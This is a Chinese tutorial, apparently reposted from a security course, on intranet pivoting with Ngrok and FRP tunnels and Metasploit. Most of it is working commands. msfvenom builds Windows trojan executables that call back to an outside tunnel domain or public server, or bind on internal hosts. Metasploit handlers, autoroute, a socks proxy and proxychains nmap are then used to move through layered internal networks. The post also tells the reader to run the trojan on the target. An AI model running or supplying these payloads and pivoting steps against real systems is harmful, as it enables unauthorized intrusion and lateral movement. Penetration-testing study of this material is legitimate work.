内网安全:Socks 代理 || 本地代理 技术.

这篇具有很好参考价值的文章主要介绍了内网安全:Socks 代理 || 本地代理 技术.。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

内网安全:Socks 代理 || 本地代理 技术.

Socks 代理又称全能代理,就像有很多跳线的转接板,它只是简单地将一端的系统连接到另外一端。支持多种协议,包括http、ftp请求及其它类型的请求。它分socks 4 和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议。其标准端口为1080.


目录:

内网安全:Socks 代理 技术.

两个内网通讯上线( Ngrok )

(1)开通隧道:

(2)下载客户端:

(3)生成一个程序后门:

(4)进行监听:(kali)

两个内网通讯上线( Frp 自建跳板 )

(1)跳板环境搭建:

(2)生成程序后面:

(3)进行监听:(kali)

本地代理:( MSF 跳板多个内网主机系列)

第二层内网代理:

(1)信息收集及配置访问:

(2)开启本地代理:

(3)内网扫描:

(4)浏览器访问:

第三层内网代理:

(1)生成正向程序后门:

(2)进行监听:

(3)信息收集及配置访问:

(4)开启本地代理:

第四层内网渗透:

(1)生成正向程序后门:

 (2)进行监听:


代理解决的问题:(1)内网有外网    (2)内网有过滤    (3)内网无外网

两个内网通讯上线( Ngrok )

开通隧道工具:https://www.ngrok.cc/user.html
理解:二个内网主机不能相互连接的,这样就可以通过开通的隧道进行连接.
(开通的隧道就是在外网开通一个域名:当目标访问这个域名,则会将数据返还回来到kali中)

(1)开通隧道:

内网安全:Socks 代理 || 本地代理 技术.

内网安全:Socks 代理 || 本地代理 技术.

内网安全:Socks 代理 || 本地代理 技术.


(2)下载客户端:

内网安全:Socks 代理 || 本地代理 技术.

内网安全:Socks 代理 || 本地代理 技术.

解压放到 kali 中:(切换的刚刚下载的文件目录中)

(1)./sunny clientid 115735315695        // 执行 

    ./sunny clientid 隧道的IP

内网安全:Socks 代理 || 本地代理 技术.

内网安全:Socks 代理 || 本地代理 技术.


(3)生成一个程序后门:(木马)

msfvenom -p windows/meterpreter/reverse_http lhost=bgxg.free.idcfengye.com lport=80 -f exe -o bgxg.exe

内网安全:Socks 代理 || 本地代理 技术.


(4)进行监听:(kali)

(1)msfconsole

(2)use exploit/multi/handler

(3)set payload windows/meterpreter/reverse_http

(4)set lhost 192.168.0.106        // 本地的 IP 地址

(5)set lport 4444                 // 本地的 端口.

(6)exploit

内网安全:Socks 代理 || 本地代理 技术.


两个内网通讯上线( Frp 自建跳板 )

(1)跳板环境搭建:

需要有自己的服务器,有来搭建跳板.
【服务器 和 控制端】需要下载的工具:https://github.com/fatedier/frp/releases

内网安全:Socks 代理 || 本地代理 技术.

服务器修改配置文件 frps.ini:
[common]
bind_port = 6677            // 这个端口修改为 服务器 开放的就行

启动服务端:【切换在下载的目录并执行】
./frps -c ./frps.ini
控制端修改配置文件 frpc.ini:
[common]
server_addr = 云主机 IP 地址
server_port = 6677                 // frpc 工作端口,必须和上面 frps 保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555                  // 转发给本机的 5555
remote_port = 6000                 // 服务端用 6000 端口转发给本机

启动客户端:【切换在下载的目录并执行】
./frpc -c ./frpc.ini

(2)生成程序后面:(木马)

msfvenom -p windows/meterpreter/reverse_tcp lhost=服务器(公网)的IP地址 lport=6000 -f exe -o frp.exe

(3)进行监听:(kali)

(1)msfconsole

(2)use exploit/multi/handler

(3)set payload windows/meterpreter/reverse_tcp

(4)set LHOST 127.0.0.1    

(5)set LPORT 5555        // 本机监听的端口【和控制端的一样】

(6)exploit

然后把程序后门(木马)放在目标主机上执行就行.

本地代理:( MSF 跳板多个内网主机系列)

第二层内网代理:

(1)信息收集及配置访问:

(1)run get_local_subnets            // 获取网络接口

(2)run autoroute -p                 // 查看路由地址

(3)run autoroute -s 10.0.20.0/24    // 添加地二层内网的路由网段.

或

(3)run post/multi/manage/autoroute        // 自动添加,目前所有路由网段

内网安全:Socks 代理 || 本地代理 技术.


(2)开启本地代理:

background                            // 挂起会话

如果是msf6,使用代理模板为:

use auxiliary/server/socks_proxy

如果是msf5,使用代理模板为:

use auxiliary/server/socks4a
(1)set srvport 2222        // 设置本地代理端口为2222

(2)exploit                 // 运行

内网安全:Socks 代理 || 本地代理 技术.


(3)内网扫描:

打开 /etc/proxychains4.conf 文件:

socks4 192.168.0.106 2222                // 添加 本地的代理和端口

内网安全:Socks 代理 || 本地代理 技术.

进行扫描:

proxychains4 nmap -sT -Pn 10.0.20.0/24 -p 80 

-Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护.

-sT:扫描 TCP 数据包已建立的连接 connect

内网安全:Socks 代理 || 本地代理 技术.


(4)浏览器访问:

内网安全:Socks 代理 || 本地代理 技术.

内网安全:Socks 代理 || 本地代理 技术.


第三层内网代理:

(1)生成正向程序后门:

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=54321 -f exe > 54321.exe

内网安全:Socks 代理 || 本地代理 技术.


(2)进行监听:

要在和上面一样的 msf 会话中执行.

(1)use exploit/multi/handler    

(2)set payload windows/x64/meterpreter/bind_tcp

(3)set rhost 10.0.20.99                // 第二层内网的 IP 地址

(4)set lport 54321                     // 和程序后面(木马)一样的端口

(5)exploit

内网安全:Socks 代理 || 本地代理 技术.


(3)信息收集及配置访问:

(1)run get_local_subnets            // 获取网络接口

(2)run autoroute -p                 // 查看路由地址

(3)run post/multi/manage/autoroute        // 自动添加,目前所有路由网段.

内网安全:Socks 代理 || 本地代理 技术.


(4)开启本地代理:

background                            // 挂起会话

如果是msf6,使用代理模板为:

use auxiliary/server/socks_proxy

如果是msf5,使用代理模板为:

use auxiliary/server/socks4a

内网安全:Socks 代理 || 本地代理 技术.

(1)set srvport 6666        // 默认端口6666

(2)exploit                 // 运行

内网安全:Socks 代理 || 本地代理 技术.


第四层内网渗透:

(1)生成正向程序后门:

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=9876 -f exe > 9876.exe

内网安全:Socks 代理 || 本地代理 技术.


 (2)进行监听:

要在和上面一样的 msf 会话中执行.

(1)use exploit/multi/handler    

(2)set payload windows/x64/meterpreter/bind_tcp

(3)set rhost 10.0.10.110                // 第二层内网的 IP 地址

(4)set lport 9876                     // 和程序后面(木马)一样的端口

(5)exploit

内网安全:Socks 代理 || 本地代理 技术.

      

     

   

学习链接:第70天:内网安全-域横向内网漫游Socks代理隧道技术_哔哩哔哩_bilibili文章来源地址https://www.toymoban.com/news/detail-480681.html

到了这里,关于内网安全:Socks 代理 || 本地代理 技术.的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 内网安全-代理Socks协议&CS-MSF控制上线

    目录 实验前提 实验环境 实验目标 环境部署 实验1 msf通信win10的56网段与正向连接  msf通信win10 msf上线win10 实验2 cs通信win10的56网段与正向连接 cs通信win10 cs上线win10   实验环境 本地计算机存在一个36网段可以与win7ping通并且可以上网。 win7存在36和52网段,可以与本地和win10p

    2024年02月16日
    浏览(39)
  • 深入探索代理技术:Socks5、IP代理与网络安全

    Socks5代理:高度灵活的网络中转站 Socks5代理是一种网络协议,允许客户端与服务器进行通信,通过代理服务器中转数据,起到隐蔽客户端身份的作用。相比于Socks4,Socks5不仅支持TCP连接,还支持UDP连接,使其在实时数据传输场景中更具优势。不过,提到\\\"SK5\\\"代理,实际上是没

    2024年02月12日
    浏览(40)
  • Socks5、网络安全、代理IP技术详解

        随着互联网的发展,网络安全问题越来越受到人们的关注。为了保护个人隐私和网络安全,使用代理服务器成为了一种普遍的选择。其中,Socks5协议是一种常见的代理协议,而代理IP是使用代理服务器时经常需要考虑的问题。本文将深入探讨Socks5、网络安全、代理IP等技术

    2024年02月07日
    浏览(49)
  • 代理IP与SOCKS5代理:网络安全与数据隐私保护的技术利器

    深入探讨代理IP和SOCKS5代理的技术性,并阐述它们在网络安全和数据隐私保护中的重要作用。我们将详细介绍代理IP的概念、工作原理和应用场景,以及SOCKS5代理协议的特点和优势。此外,我们还将讨论如何使用代理IP和SOCKS5代理实现匿名访问、绕过封锁和保护个人隐私。通过

    2024年02月11日
    浏览(46)
  • 代理IP、Socks5代理、SK5代理与网络安全:保护隐私与防御威胁的技术探索

    随着数字化时代的到来,网络安全和个人隐私保护日益成为重要议题。代理IP、Socks5代理和SK5代理作为关键技术手段,为用户提供了保护隐私、提高网络安全性和防御网络威胁的解决方案。本文将深入探讨这些代理技术的原理、特点以及它们与网络安全的紧密联系。 【第一部

    2024年02月13日
    浏览(53)
  • Socks5与代理IP技术探析:构建安全高效的网络通信

    1.1 握手与身份验证 Socks5协议的握手阶段通过版本协商和灵活的身份验证方式建立安全连接。这确保了通信的可靠性和用户身份的安全。 1.2 数据传输机制 Socks5通过代理实现数据传输,支持TCP和UDP协议,为用户提供了高度灵活的网络通信机制。连接一旦建立,数据可以通过代

    2024年02月04日
    浏览(48)
  • Socks5与代理IP技术的深度解析:保障网络通信安全的利器

    随着互联网的发展,网络通信的安全性和隐私保护变得尤为重要。Socks5协议与代理IP技术作为保护网络通信的关键工具,为用户提供了更加安全、私密的网络访问方式。本文将深入探讨Socks5协议和代理IP技术的原理、特性以及其在实际应用中的技术细节。 2.1 握手与认证 Socks

    2024年02月20日
    浏览(40)
  • 全面解析 SOCKS5 代理和 HTTP 代理在网络安全与爬虫应用中的技术对比与应用指南

    一、SOCKS5 代理和 HTTP 代理的基本原理 SOCKS5 代理:SOCKS5 是一种网络协议,可以在传输层代理 TCP 和 UDP 请求。它不解析请求内容,仅在客户端和代理服务器之间建立连接,并转发数据。SOCKS5 代理支持众多网络协议和端口类型,具有较高的灵活性和通用性。 HTTP 代理:HTTP 代理

    2024年02月15日
    浏览(52)
  • 内网安全:代理技术详解

    目录 代理技术实验所用网络拓扑图及说明 代理技术 SOCK协议 使用代理技术的原因 正向代理与反向代理 实战一:MSF代理通讯 实验原理说明 一. Meterpreter建立路由 二. MSF建立节点 三. 建立代理到MSF上 实战二:CS代理通讯 实验原理说明 一. CS建立SOCKS代理 二. 使用proxifier 设置代理

    2024年02月07日
    浏览(65)
  • 内网渗透测试 MSF搭建socks代理

    最终效果为如此,web服务器可以ping通外网和内网两台服务器     信息收集 发现端口: 80 http 3306 mysql 敏感目录: /phpMyadmin 现在咱们查询一下日志功能是否开启,默认是关闭的。 show variables like \\\"general_log%\\\"; 命令行 set globalgeneral_log=\\\'on\\\'; 图形化: 输入一句话木马并执行,使日志

    2023年04月08日
    浏览(41)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包